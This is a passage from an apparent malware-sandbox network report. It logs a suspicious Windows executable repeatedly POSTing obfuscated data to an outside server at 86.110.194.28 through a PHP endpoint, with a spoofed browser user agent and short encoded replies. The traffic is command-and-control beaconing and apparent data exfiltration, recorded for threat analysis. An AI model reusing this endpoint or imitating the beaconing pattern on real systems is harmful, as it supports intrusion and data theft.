                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:19.355535984 CET2516OUTData Raw: 5e 52 5e 5b 58 58 55 58 54 5b 59 5a 5b 54 57 5e 5f 50 5a 5b 52 53 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R^[XXUXT[YZ[TW^_PZ[RSPBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+!]5'1</>*$7>2,5P5'!W#+7'3<$T+9#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:19.687212944 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:19.824778080 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:19 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        37192.168.2.44986486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:19.951108932 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:20.308636904 CET2516OUTData Raw: 5b 54 5b 58 5d 5b 55 58 54 5b 59 5a 5b 56 57 5a 5f 54 5a 5c 52 55 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T[X][UXT[YZ[VWZ_TZ\RUPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E?5Z#:2<;=+6Z'4&Y6"7* ;(X0#&???#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:58:20.642127991 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:20.777724981 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:20 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        38192.168.2.44987086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:20.929619074 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:21.277426004 CET2516OUTData Raw: 5b 51 5b 5f 5d 59 55 5f 54 5b 59 5a 5b 56 57 5f 5f 50 5a 5d 52 53 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q[_]YU_T[YZ[VW__PZ]RSPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C?_"8T$/ B=>['7%%<:549Q +30)<A$$+)#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:58:21.662894011 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:21.796560049 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:21 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        39192.168.2.44987986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:21.949522972 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:22.308644056 CET2516OUTData Raw: 5e 51 5e 51 5d 5d 55 5d 54 5b 59 5a 5b 5e 57 5f 5f 5d 5a 5f 52 52 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q^Q]]U]T[YZ[^W__]Z_RRPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E<-\",S$,'*;%0=&,&"$:#3$(B3/<#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:22.651259899 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:22.782488108 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:22 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        40192.168.2.44988686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:22.908792973 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:23.262917042 CET2516OUTData Raw: 5e 52 5e 50 58 5a 55 5b 54 5b 59 5a 5b 5f 57 5e 5f 54 5a 5c 52 56 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R^PXZU[T[YZ[_W^_TZ\RVPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B(=2!R%Z D)()$B>&?!$.#;($)E0<8+)#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:23.597631931 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:23.728682041 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:23 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        41192.168.2.44988886.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:22.940787077 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:23.293240070 CET2108OUTData Raw: 5e 56 5e 5f 58 56 55 5a 54 5b 59 5a 5b 5f 57 5a 5f 53 5a 59 52 50 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^V^_XVUZT[YZ[_WZ_SZYRPPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&)-5_59$U2)]!'49]%P 79Q + Z3B',,(9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:23.638592005 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        42192.168.2.44989486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:23.858963013 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:24.215045929 CET2516OUTData Raw: 5b 51 5e 51 58 58 55 58 54 5b 59 5a 5b 56 57 59 5f 52 5a 59 52 51 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^QXXUXT[YZ[VWY_RZYRQPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&A<)_59<U%#=+$\%R!'5V#8/$)$&, U+#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:58:24.542840958 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:24.675411940 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:24 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        43192.168.2.44990086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:24.817399025 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:25.168042898 CET2516OUTData Raw: 5e 57 5e 5c 58 56 50 5a 54 5b 59 5a 5b 52 57 5e 5f 57 5a 5a 52 55 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W^\XVPZT[YZ[RW^_WZZRUPBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&@+!!8W20C==$4:'<6 $P#;3'9+'/())#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:58:25.510713100 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:25.639461040 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:25 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        44192.168.2.44990986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:25.775222063 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:26.121156931 CET2516OUTData Raw: 5e 56 5e 50 5d 5e 55 58 54 5b 59 5a 5b 54 57 5e 5f 54 5a 54 52 5c 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^V^P]^UXT[YZ[TW^_TZTR\PHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(X5\!9 2/>"Y$=Y%Y=Q"B*7 Z%)#'8W(9#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:26.466094971 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:26.598798037 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:26 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        45192.168.2.44991586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:26.722038031 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:27.074531078 CET2516OUTData Raw: 5b 50 5e 51 58 5f 50 51 54 5b 59 5a 5b 51 57 5f 5f 53 5a 54 52 53 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^QX_PQT[YZ[QW__SZTRSPBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E+=*":/1(;.':'?9P!$!P#00:'&/(#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:27.404208899 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:27.535804987 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:27 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        46192.168.2.44992386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:27.658875942 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:28.011814117 CET2516OUTData Raw: 5b 50 5e 58 5d 5a 55 58 54 5b 59 5a 5b 51 57 5c 5f 50 5a 55 52 54 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^X]ZUXT[YZ[QW\_PZURTPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(="!R%(E*+&3:2<=R5:4($9C'<R<#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:28.366872072 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:28.498620033 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:28 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        47192.168.2.44992986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:28.630386114 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        48192.168.2.44993386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:28.736430883 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:29.090044022 CET2108OUTData Raw: 5e 50 5b 5f 58 59 50 5b 54 5b 59 5a 5b 51 57 59 5f 50 5a 5b 52 5d 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P[_XYP[T[YZ[QWY_PZ[R]PGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&)>Z50T&/0>3=Y&<)S"$) 8$$) $?,)9#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:29.425896883 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:29.558742046 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:29 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 1e 26 3b 31 01 3e 3f 06 03 26 0d 36 00 22 30 38 59 2f 20 32 09 35 5a 39 58 25 3b 24 51 2b 3e 2e 40 3c 0d 22 09 20 00 04 0c 2b 0a 28 5d 03 10 39 10 3c 2e 23 11 2a 07 35 5f 2e 19 2f 5e 27 27 06 5b 3e 23 0b 57 27 2f 3d 0c 36 04 3b 54 3d 33 3d 5e 24 38 30 5c 2a 30 20 02 25 2d 20 54 0b 17 24 0e 27 33 33 5b 32 3b 21 5a 3e 09 1a 5b 27 04 26 08 22 2f 32 52 20 2a 38 5e 2f 56 29 11 27 16 22 0a 3e 2e 2b 1f 26 14 36 5d 33 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $&;1>?&6"08Y/ 25Z9X%;$Q+>.@<" +(]9<.#*5_./^''[>#W'/=6;T=3=^$80\*0 %- T$'33[2;!Z>['&"/2R *8^/V)'">.+&6]3+.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        49192.168.2.44993486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
